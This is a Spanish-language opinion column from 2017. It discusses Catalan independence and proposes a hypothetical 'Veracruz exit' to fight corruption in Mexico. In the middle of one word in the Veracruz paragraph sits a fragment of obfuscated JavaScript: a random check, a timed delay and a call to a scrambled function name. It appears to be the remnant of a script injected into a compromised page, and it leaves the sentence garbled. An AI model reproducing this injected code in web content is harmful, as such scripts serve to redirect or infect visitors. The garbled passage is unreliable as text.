Viva la independencia de Cataluña

30 noviembre, 2017

Qué bueno que los pueblos se separen de su raíz, ¡¡¡ahhh, bárbaro!!! ¿qué cosas dices?? Si digo esto es porque México se separó de España y la incipiente nación americana, hoy Estados Unidos, también se separó de Inglaterra y así podría dar una gran cantidad de ejemplos de separación de los pueblos que se ven más allá de nuestras fronteras; éstos se juntan y arman otra nación y los catalanes lo están haciendo mal.

La nación española tiene una constitución que no permite la separación de sus estados, salvo que el Parlamento, a través de unas votaciones, lo permita o vea la necesidad que lleve a un consenso de la mayoría para poder dar la libertad de hacer otro estado, pues han visto mermadas sus arcas, se lleven todo el dinero de sus recursos con motivo de sus impuestos y no retribuyen a la provincia para su infraestructura, así como también la libertad de expresión, ya que a los líderes los golpearon y metieron a la cárcel.

Por eso y muchas otras cosas, el centro abusó de su poder. Cuántas veces lo hemos visto, que los mozos de la Civil embaten a los manifestantes, los golpean a vil garrote, pero las autoridades superiores no quieren dialogar y los independentistas tampoco. Sería bueno declarar una amnistía de diálogo que permita llegar a un acuerdo, ya que de no ser así el Ejército los va a reprimir violentamente.

Supongamos que Veracruz, un estado que lo tiene todo, bien podríamos separarnos para hacer, en primer lugar, un estado seguro y resolver todas las broncas financieras que tenemos, contratandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando unos administradores honestos y unos contadores y auditores de reconocida honradez a prueba de balazos, que sí los hay, pero hay que seleccionarlos con una fianza, ya que manejarán el dinero que será para ser devuelto, y en caso contrario, cárcel de inmediato.

El proceso de independencia, “Veracruz exit”, tendría el aval de la legislatura federal y de los senadores y también del Poder judicial estatal, ahora es un pimpón que no ata ni desata ni meten al bote a nadie.

Así que, amigos, es necesario poner un alto a la impunidad rampante que sucede en México y en el Estado, tanto en la tesorería como en la seguridad. La sociedad civil tiene que “tomar el toro por los cuernos” y regular administrar nuestros recuerdos.

Hagamos un portal de quejas.

Yo me ofrezco a canalizar todas las quejas par así dormir tranquilos. En caso contrario, vayan al diablo y que Dios los acompañe o a la chingada.